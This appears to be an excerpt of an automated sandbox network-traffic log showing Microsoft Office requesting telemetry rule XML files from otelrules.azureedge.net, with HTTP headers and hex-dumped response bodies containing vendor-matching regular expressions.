                                                                                        2024-11-01 12:46:46 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        43192.168.2.44980113.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:45 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:46 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:46 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 467
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                        ETag: "0x8DC582BA6C038BC"
                                                                                        x-ms-request-id: 12e859be-a01e-0098-7408-2c8556000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124646Z-16ccfc498972mdvzhC1DFWzrms00000000mg0000000074uz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:46 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        44192.168.2.44980013.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:45 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:46 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:46 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 632
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                        ETag: "0x8DC582BB6E3779E"
                                                                                        x-ms-request-id: 23cb21e1-e01e-0052-4e08-2cd9df000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124646Z-16ccfc49897nrfsvhC1DFW8e0000000000u0000000000a4w
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:46 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        45192.168.2.44980313.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:46 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:46 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:46 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 407
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                        ETag: "0x8DC582BBAD04B7B"
                                                                                        x-ms-request-id: 718751ec-501e-0078-1528-2c06cf000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124646Z-176bd8f9bc59g2s2hC1DFWby1800000000qg000000009def
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:46 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        46192.168.2.44980513.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:46 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:46 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:46 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                        ETag: "0x8DC582BA310DA18"
                                                                                        x-ms-request-id: d7649e4f-901e-0015-0208-2cb284000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124646Z-16ccfc498979lfwnhC1DFW56w800000000n000000000mm0e
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:46 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        47192.168.2.44980413.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:46 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:47 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:46 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 486
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                        ETag: "0x8DC582BB344914B"
                                                                                        x-ms-request-id: 12e51ca0-101e-000b-3c00-2c5e5c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124646Z-176bd8f9bc598x8vhC1DFWq73s00000000tg00000000946v
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:47 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        48192.168.2.44980713.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:46 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:46 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:46 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 407
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                        ETag: "0x8DC582B9698189B"
                                                                                        x-ms-request-id: bc8d97c4-d01e-00a1-8008-2c35b1000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124646Z-16ccfc49897d998fhC1DFWbah400000000qg0000000055gf
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:46 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        49192.168.2.44980613.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:46 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:46 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:46 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 486
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                        ETag: "0x8DC582B9018290B"
                                                                                        x-ms-request-id: 6d8432ff-e01e-001f-0608-2c1633000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124646Z-16ccfc49897z67z2hC1DFW6cd800000000eg0000000092vg
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:46 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        50192.168.2.44980813.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:47 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:47 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 469
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                        ETag: "0x8DC582BBA701121"
                                                                                        x-ms-request-id: 158090c8-001e-0049-7838-2c5bd5000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124647Z-16dc884887b6v426hC1DFWstvw00000000m0000000006unz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:47 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        51192.168.2.44980913.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:47 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:47 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                        ETag: "0x8DC582BA41997E3"
                                                                                        x-ms-request-id: 12fa9963-101e-000b-2608-2c5e5c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124647Z-16dc884887b5wkkfhC1DFWur1000000000kg000000002ru6
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:47 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        52192.168.2.44981013.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:47 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:47 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 477
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                                        x-ms-request-id: f6a679f0-201e-0033-0608-2cb167000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124647Z-16ccfc49897wlhjjhC1DFWsx6c00000000dg00000000abdg
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:47 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        53192.168.2.44981113.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:47 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
